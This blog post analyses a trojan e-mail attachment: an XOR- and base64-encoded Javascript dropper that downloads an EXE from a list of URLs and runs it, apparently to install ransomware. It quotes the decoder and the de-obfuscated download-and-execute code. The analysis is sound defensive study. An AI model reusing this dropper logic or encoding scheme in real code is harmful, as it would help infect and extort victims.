Recently I received two similar e-mails with attached trojans, both using encoded Javascript. In this post we look into how the Javascript is encoded and what it does when it is run.

The e-mail described that I received a remittance and that I should open the attachment to claim my money. The attachment was a ZIP file named WU6533175781.zip, containing a ZIP file named file.zip, containing a Javascript file named invoice_Ir1vkp.js. The file is probably zipped twice to get around some antivirus software. Also, the Javascript is encoded:

var insensatePtK = decode('"AD4qHg9EOH0qJwgvWw=="');
var revelryk8e = decode('"Gj4RISoGYgs0AyUXY2Y="');
…
if (riledjg) {
    engageegd[toutfVe](wandervwY + Math.pow(2, 19));
}

As you can see both the variable names and the string literals are encoded. The decode function is defined in the same file. It base64-decodes the string and XORs it with a cipher. The code to base64-decode is copied literally from webtoolkit.info.

var decode = function (packedText) {
    var cipher ="WmIlf4LSyOmC766Y";
    …
    var text = Base64.decode(packedText);

    var cipherLength = cipher.length;
    var result = "";
    for (var i = 0; i < text.length; i++) {
        result += String.fromCharCode(text.charCodeAt(i) ^ cipher.charCodeAt(i % cipherLength));
    }
    return result;
};

Now, what is interesting is that the two mails that I received had basically the same Javascript, encoded differently. So the structure and the decode function was the same, but the cipher, the string literals and the variable names differed. I assume this is to make it harder for virus scanners to detect this thing. It is remarkable then that the decode function itself is not obfuscated, so that would be an easy marker to recognize this malware.

Because we have the decode function it is easy to decode all the strings in the script, and we can rename the variables to see what the code really does:

var wscriptShell = "WScript.Shell";
var shellObject = WScript.CreateObject(wscriptShell);
…        
for (var i = 0; i < urls.length; i++) {
    try {
        var url = urls[i];
        httpObject.open(get, url, false);
        httpObject.send();
        if (httpObject.status == statusOk) {
            try {
                streamObject.open();
                streamObject.type = 1;
                streamObject.write(httpObject.responseBody);
                if (streamObject.size > minSize) {
                    i = urls.length;
                    streamObject.position = 0;
                    streamObject.saveToFile(exePath, 2);
                    success = true;
                }
            } finally {
                streamObject.close();
            }
        }
    } catch (ignored) {}
}
if (success) {
    shellObject[exec](tempDir + Math.pow(2, 19));
}

Apparently it downloads an EXE into the temp directory, and runs it. I assume to install the latest CryptoLocker variation. Normally in a web browser you can’t download things and run EXE’s. However, this script is sent as an attachment and meant to be run from the disk and not from the internet, which gives it permissions to do these things.

As you can see it takes extra effort to obfuscate the EXE filename, using 524288 at one place and Math.pow(2, 19), which is also 524288, when actually running the file. It is a pretty simple piece of Javascript, encoded in a simple way. However, the encoding makes it possible to change the code in each spam campaign or perhaps even each e-mail, which makes it hard to block by virus scanners.